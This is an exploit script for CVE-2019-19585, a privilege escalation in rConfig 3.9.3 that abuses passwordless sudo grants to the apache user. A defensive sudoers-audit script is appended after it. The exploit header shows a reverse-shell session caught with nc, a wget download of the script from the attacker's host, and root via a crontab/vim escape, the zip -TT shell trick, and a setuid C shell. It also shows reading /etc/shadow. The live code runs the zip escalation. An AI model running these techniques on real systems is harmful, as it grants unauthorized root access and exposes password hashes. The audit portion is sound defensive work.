exploits-rconfig/rconfig_lpe.sh (110 lines, 3.92 KB)
# Exploit Title: rConfig <= v3.9.3 - Privilege Escalation
# Date: 07/11/2019
# CVE-2019-19585
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: CentOS 7.7
#
# Notes : If you want to reproduce this in your lab environment, follow these links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# Reading the "rConfig 3.x Installation Instructions" (http://help.rconfig.com/gettingstarted/installation), we can notice that 2 install scripts are used :
# $ curl -O http://files.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"
# $ grep curl install_rConfig.sh
# curl -O http://files.rconfig.com/downloads/scripts/centos7_install.sh -A "Mozilla" >> $LOGFILE 2>&1
# curl -O http://files.rconfig.com/downloads/scripts/centos6_install.sh -A "Mozilla" >> $LOGFILE 2>&1
#
# Looking at the install scripts, we see that the apache user is a sudoer.
# $ sed -n 131,148p centos7_install.sh
# #SUDOERs Update
# SUDOINSTALLMSG="Updating Sudoers File..."
# echo $SUDOINSTALLMSG;
# echo -ne '##### (33%\r)'
# sleep 1
# echo -ne '############# (66%)\r'
# sleep 1
# echo -ne '##########################(100%)\n'
# echo "<<<< Start - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1
# # update sudoers for rconfig specific tasks
# echo '### rConfig specific Apahce configuration' >> /etc/sudoers
# echo 'apache ALL = (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm' >> /etc/sudoers
# echo 'Defaults:apache !requiretty' >> /etc/sudoers
# cat /etc/sudoers >> $LOGFILE 2>&1
# echo -e "${green}Status: Sudoers Updated${reset}\n";
# echo "<<<< End - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1
#
# So if an attacker gets web RCE / shell access as the apache user, privilege escalation can be done with multiple techniques.
#
# Example
# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
#
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34470
# bash: no job control in this shell
# bash-4.2$
#
# bash-4.2$ wget http://192.168.43.245:8000/rconfig_lpe.sh
# wget http://192.168.43.245:8000/rconfig_lpe.sh
# bash-4.2$ chmod 700 rconfig_lpe.sh
# bash-4.2$ ./rconfig_lpe.sh
#
# ./rconfig_lpe.sh
# rConfig v3.9.3 - Privilege Escalation
# id
# uid=0(root) gid=0(root) groups=0(root)
###########################
# LPE using crontab (ex : using vim)
###########################
# bash-4.2$ sudo crontab -e
# sudo crontab -e
# ...
# :set shell=/bin/sh
# :shell
# id
# uid=0(root) gid=0(root) groups=0(root)
###########################
# LPE using ZIP
###########################
# bash-4.2$ touch /tmp/LPE.txt
# bash-4.2$ sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'
# id
# uid=0(root) gid=0(root) groups=0(root)
echo "rConfig v3.9.3 - Privilege Escalation"
touch /tmp/LPE.txt
sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'
###########################
# LPE using chmod / chown
###########################
# bash-4.2$ cd /tmp
# bash-4.2$ echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c
# bash-4.2$ gcc -o privshell privshell.c
# bash-4.2$ rm privshell.c
# bash-4.2$ sudo chown root:root /tmp/privshell
# bash-4.2$ sudo chmod u+s /tmp/privshell
# bash-4.2$ ./privshell
# id
# uid=0(root) gid=48(apache) groups=48(apache)
###########################
# FILE READ using TAIL
###########################
# bash-4.2$ sudo tail -22 /etc/shadow
# sudo tail -22 /etc/shadow
# root:$6$Jhxxxxxxxxxxxxxxxxxxx8/:18208:0:99999:7:::
# bin:*:17834:0:99999:7:::
# daemon:*:17834:0:99999:7:::
# ...
# EOF
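The root cause the header documents is the sudoers line the installer appends: the apache account gets passwordless root for binaries that can spawn a shell from an editor (crontab -e), run a command via a test hook (zip -TT), turn a file into a setuid root binary (chmod/chown), read any file (tail) or delete any file (rm). The following POSIX shell audit is an added example for defenders, not part of rconfig_lpe.sh or of the rConfig project: it flags such NOPASSWD grants in a sudoers file. The function names (`make_sample_sudoers`, `sudoers_risky_cmds`, `sudoers_risky_count`, `sudoers_user_is_risky`) and the list of risky basenames are assumptions chosen here, and the sample sudoers content is constructed to mirror the installer's line.

```shell
#!/bin/sh
# Added example (not part of rconfig_lpe.sh): audit a sudoers file for NOPASSWD
# grants to a service account that include binaries with known shell-escape,
# ownership-change, file-read or file-delete capability. The basename list is an
# assumption drawn from the techniques documented in the exploit header above.
RISKY_BASENAMES="crontab zip chmod chown tail rm"

# make_sample_sudoers: write a constructed sudoers file mirroring the lines that
# centos7_install.sh appends, and print its path (caller removes it).
make_sample_sudoers() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root ALL=(ALL) ALL
### rConfig specific Apahce configuration
apache ALL = (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm
Defaults:apache !requiretty
EOF
    printf '%s\n' "$f"
}

# sudoers_risky_cmds FILE USER
# Prints, one per line, every command in USER's NOPASSWD grants whose basename is
# in RISKY_BASENAMES. Comment lines and grants for other users are ignored.
sudoers_risky_cmds() {
    awk -v user="$2" -v risky="$RISKY_BASENAMES" '
        BEGIN {
            n = split(risky, r, " ")
            for (i = 1; i <= n; i++) bad[r[i]] = 1
        }
        /^[ \t]*#/ { next }                       # skip comment lines
        $1 == user && /NOPASSWD:/ {
            sub(/.*NOPASSWD:[ \t]*/, "")          # keep only the command list
            m = split($0, cmds, ",")
            for (i = 1; i <= m; i++) {
                cmd = cmds[i]
                gsub(/^[ \t]+|[ \t]+$/, "", cmd)  # trim surrounding whitespace
                sub(/[ \t].*/, "", cmd)           # drop any arguments after the path
                base = cmd
                sub(/.*\//, "", base)             # basename of the command
                if (base in bad) print cmd
            }
        }' "$1"
}

# sudoers_risky_count FILE USER: number of risky commands found (0 if none).
sudoers_risky_count() {
    sudoers_risky_cmds "$1" "$2" | awk 'END { print NR }'
}

# sudoers_user_is_risky FILE USER: succeeds (exit 0) if any risky grant exists.
sudoers_user_is_risky() {
    [ "$(sudoers_risky_count "$1" "$2")" -gt 0 ]
}

# Demo on the constructed sample: prints the six risky commands and their count.
sample=$(make_sample_sudoers)
sudoers_risky_cmds "$sample" apache
printf 'risky NOPASSWD grants for apache: %s\n' "$(sudoers_risky_count "$sample" apache)"
rm -f "$sample"
```

On a real host, run `sudoers_risky_cmds` against `/etc/sudoers` and each file under `/etc/sudoers.d`; any hit for a service account such as apache is a finding, since those binaries cannot be made safe by restricting arguments alone and the grant should be replaced by a narrowly scoped helper that the web application calls instead.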